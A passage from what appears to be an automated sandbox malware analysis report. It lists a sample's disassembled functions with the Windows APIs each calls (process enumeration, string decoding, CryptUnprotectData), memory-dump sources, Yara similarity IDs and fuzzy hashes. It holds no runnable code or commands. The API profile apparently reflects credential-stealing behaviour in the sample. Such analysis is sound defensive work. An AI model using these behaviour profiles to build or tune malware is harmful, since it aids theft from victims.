                            • Part of subcall function 00427310: lstrcat.KERNEL32(?,------), ref: 00427349
                            • Part of subcall function 00427280: lstrcpy.KERNEL32(00000000), ref: 004272AE
                          • CloseHandle.KERNEL32(00000000), ref: 00423BF7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 49579a6b685d4f0f0103baf5644634ac2fcfc3f96350a6441b66680175cd71cd
                          • Instruction ID: e51cc00c34693d79734f6d5c1490cc69d98379875bceab306ad95a5bdef0a7c3
                          • Opcode Fuzzy Hash: 49579a6b685d4f0f0103baf5644634ac2fcfc3f96350a6441b66680175cd71cd
                          • Instruction Fuzzy Hash: 5381F931A00224CFC714CF15E948B96B7B1FB45315F69C1AED409AB3A2D77AAD82CF94
                          Function 0040EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0040EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040EA7E
                          • lstrcat.KERNEL32(0042CFEC,0042CFEC), ref: 0040EB27
                          • lstrcat.KERNEL32(0042CFEC,0042CFEC), ref: 0040EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: e83a5e54b61dfc76abc0d04699baaf89736fffa06499f80dd4cfcf4e1ca2cc2a
                          • Instruction ID: 1f066aa5abf7061ceb93934b663a37ce6f19afdfb086fbf955777a802f987be8
                          • Opcode Fuzzy Hash: e83a5e54b61dfc76abc0d04699baaf89736fffa06499f80dd4cfcf4e1ca2cc2a
                          • Instruction Fuzzy Hash: 7F31B275B00218ABDB10DB59EC45FEFB77A9F84705F0441AAFA09E3280DBB45A14CBE5
                          Function 004240B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 004240CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 004240DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 004240E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00424113
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                          • Instruction ID: 804da95bf751652d27495f4eafff97b2fff01ecd0487fb5237b818349f7ed981
                          • Opcode Fuzzy Hash: 1654423fd72de82e54ce634d70b22f0d0a00e139ff6f7135eda8dce405f6aeb9
                          • Instruction Fuzzy Hash: FD011A70600215ABDB149FA5EC89BABBBAEEF85311F108159BE0987340DA719980CBA4
                          Function 00422B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0042A3D0,000000FF), ref: 00422B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00422B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0042A3D0,000000FF), ref: 00422BA2
                          • wsprintfA.USER32 ref: 00422BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 1187c665280c0081dca809d70cdac0b9e14ddbc1924146aa472259be47c606b7
                          • Instruction ID: 8c34349a47f058d6690e60c1733dac4b139ae13e761a6dd5b4e63d16ae77d0dd
                          • Opcode Fuzzy Hash: 1187c665280c0081dca809d70cdac0b9e14ddbc1924146aa472259be47c606b7
                          • Instruction Fuzzy Hash: A10140B2904628ABCB149BD9DD45FBEB7BDFB4CB11F00011AFA45A2290E7B85940C7B5
                          Function 00409B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00409B61
                          • LocalFree.KERNEL32 ref: 00409B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                          • Instruction ID: fdb19b52b522e7fb6258fb386c859728d3eb4189d8c812c623f7d3b132898295
                          • Opcode Fuzzy Hash: 52a740a2c3a0b915a6e879fc1adc512548ca54352df63306b7731fa0a6cd477b
                          • Instruction Fuzzy Hash: 89F0BD703443126BE7305F65AC49F577BA9EF04B61F240515FA45EA2D0D7B49C40CAA4
                          Function 007C05D4 Relevance: 5.4, Strings: 3, Instructions: 1672COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: *EU$6g{z$l{
                          • API String ID: 0-815813904
                          • Opcode ID: f310adea1e539dd68d988248300f274b4193488007c88f08e4466cb4717efa0e
                          • Instruction ID: 910029a2e33147f37f9c087708718c5cfb7c3b9adfdbe4dee189c75088773b13
                          • Opcode Fuzzy Hash: f310adea1e539dd68d988248300f274b4193488007c88f08e4466cb4717efa0e
                          • Instruction Fuzzy Hash: 73B22AF3A0C2009FE304AE2DEC4567AFBE9EF94720F16853DEAC4C7744EA3558458696
                          Function 007C71ED Relevance: 5.4, Strings: 3, Instructions: 1661COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: A?-$D<yw$hl
                          • API String ID: 0-600232951
                          • Opcode ID: 23440d4057288ae928e9aa07ad1477357785b19578f6e6047c5de917041e7e24
                          • Instruction ID: a052723cc1cce676d3219ca819738b5f8fb0ac248f8fcb5981151846a9ffe830
                          • Opcode Fuzzy Hash: 23440d4057288ae928e9aa07ad1477357785b19578f6e6047c5de917041e7e24
                          • Instruction Fuzzy Hash: 8BB22BF360C204AFE304AE2DEC8567BB7E9EBD4720F16863DE6C5C3744EA3558058696
                          Function 007CA7BA Relevance: 5.4, Strings: 3, Instructions: 1659COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: $L^o$EX4$SYFY
                          • API String ID: 0-2102620248
                          • Opcode ID: 9fe9d4ffa40eddab95351e155a1f6e4f883fb1efccdf47dd69477edb550ccbe1
                          • Instruction ID: c7d12ae53358c8e48edcdbfb550e742497e7d0b4ddb3de46e284c7e7629d99d7
                          • Opcode Fuzzy Hash: 9fe9d4ffa40eddab95351e155a1f6e4f883fb1efccdf47dd69477edb550ccbe1
                          • Instruction Fuzzy Hash: B8B259F3A0C2049FD3046F2DEC85A7ABBE9EF94720F1A493DEAC4C7744E67558018696
                          Function 0041CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0042B110,00000000,00000001,0042B100,?), ref: 0041CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0041CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0041CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: 356407dd27f615bd9d7e1c9fd377e8c2577ed93a8701771f82fb0a3cc92fc221
                          • Instruction ID: 1b90be6a62ff22c9a4e24909d29a5cecf1084cb0eae29e4f46ca5412203977ef
                          • Opcode Fuzzy Hash: 356407dd27f615bd9d7e1c9fd377e8c2577ed93a8701771f82fb0a3cc92fc221
                          • Instruction Fuzzy Hash: D4316471A40624AFD710DB94DC82FEAB7B9DB88B10F104185FA14EB2D0D7B4AE44CBE4
                          Function 00409B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00409BB3
                          • LocalFree.KERNEL32(?), ref: 00409BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: e6970078d33f0c9cac3d8d233968411e51d5df21ceb30eb19583022ed57f2fb8
                          • Instruction ID: 53b88ad36b60bd237d2e400e03c78e8b02b6d7bc2306e19c9fd1f58beb86f7b1
                          • Opcode Fuzzy Hash: e6970078d33f0c9cac3d8d233968411e51d5df21ceb30eb19583022ed57f2fb8
                          • Instruction Fuzzy Hash: 20011DB5A41309ABE710DBA4DC45FABB779EB44B00F104559FA04AB381E7B4AE008BE5
                          Function 007B4709 Relevance: 4.2, Strings: 2, Instructions: 1651COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
